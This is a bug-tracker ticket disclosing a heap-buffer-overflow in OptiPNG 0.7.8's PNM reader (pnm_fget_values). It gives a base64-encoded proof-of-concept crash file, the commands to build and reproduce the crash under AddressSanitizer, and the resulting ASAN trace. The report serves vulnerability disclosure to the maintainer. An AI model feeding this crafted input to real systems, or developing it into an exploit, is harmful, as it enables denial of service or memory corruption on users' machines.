Heap-buffer-overflow at pnm_fget_values

Advanced PNG optimization program

Status: Beta

Brought to you by: cosmin

#89 Heap-buffer-overflow at pnm_fget_values

Milestone: v1.0 (example)

Status: open

Owner: Cosmin Truta

Labels: None

Priority: 5

Updated: 2024-01-12

Created: 2024-01-12

Creator: Yun

Private: No

Heap-buffer-overflow at pnm_fget_values

Description

It looks like a memory bug on OptiPNG.

Version

OptiPNG version 0.7.8

Reproduction Steps

Environment

Ubuntu 20.04 LTS
clang version 10.0.0-4ubuntu1

PoC

echo UDYKNjI2NjY2NjY2NgoyCjMBADY2NjY2NjY2NgAAACAAAAAgCAMAAABEpIrGNjY2NjY2NjY2IzY2NjY2NjY2NjY2/zj2yQ== | base64 -d > poc1.png

Or please refer to the attachment

Build and reproduce

CC=clang CFLAGS=-fsanitize=address LDFLAGS='-fsanitize=address' ./configure -enable-debug

make -j4

echo UDYKNjI2NjY2NjY2NgoyCjMBADY2NjY2NjY2NgAAACAAAAAgCAMAAABEpIrGNjY2NjY2NjY2IzY2NjY2NjY2NjY2/zj2yQ== | base64 -d > poc1.png

./src/optipng/optipng  poc1.png

ASAN logs

./src/optipng/optipng  poc1.png
** Processing: poc1.png
=================================================================
==52427==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f08626d37f8 at pc 0x0000004942ff bp 0x7ffcf5111920 sp 0x7ffcf51110e8
WRITE of size 23660392228 at 0x7f08626d37f8 thread T0
    #0 0x4942fe in __asan_memset (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x4942fe)
    #1 0x56bac3 in pnm_fget_values /mydata/data/code/temp/optipng-0.7.8/src/pnmio/pnmin.c:290:9
    #2 0x4e9dfd in pngx_read_pnm /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxrpnm.c:174:14
    #3 0x4e31da in pngx_read_image /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxread.c:130:13
    #4 0x4cbc63 in opng_read_file /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:983:19
    #5 0x4c9894 in opng_optimize_impl /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1566:9
    #6 0x4c8f8e in opng_optimize /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1934:9
    #7 0x4c6496 in process_files /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:927:13
    #8 0x4c4328 in main /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:961:18
    #9 0x7f0b26ec8082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41c45d in _start (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x41c45d)

0x7f08626d37f8 is located 0 bytes to the right of 6480523256-byte region [0x7f06e0284800,0x7f08626d37f8)
allocated by thread T0 here:
    #0 0x494b9d in malloc (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x494b9d)
    #1 0x4f493e in png_malloc_base /mydata/data/code/temp/optipng-0.7.8/third_party/libpng/pngmem.c:95:17
    #2 0x4f48bb in png_malloc /mydata/data/code/temp/optipng-0.7.8/third_party/libpng/pngmem.c:179:10
    #3 0x4e9d99 in pngx_read_pnm /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxrpnm.c:165:10
    #4 0x4e31da in pngx_read_image /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxread.c:130:13
    #5 0x4cbc63 in opng_read_file /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:983:19
    #6 0x4c9894 in opng_optimize_impl /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1566:9
    #7 0x4c8f8e in opng_optimize /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1934:9
    #8 0x4c6496 in process_files /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:927:13
    #9 0x4c4328 in main /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:961:18
    #10 0x7f0b26ec8082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x4942fe) in __asan_memset
Shadow bytes around the buggy address:
  0x0fe18c4d26a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe18c4d26f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
  0x0fe18c4d2700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==52427==ABORTING

1 Attachments

poc.zip

Heap-buffer-overflow at pnm_fget_values

Advanced PNG optimization program

Group

Searches

Help

#89 Heap-buffer-overflow at pnm_fget_values

Heap-buffer-overflow at pnm_fget_values

Description

Version

Reproduction Steps

Environment

PoC

Build and reproduce

ASAN logs

Discussion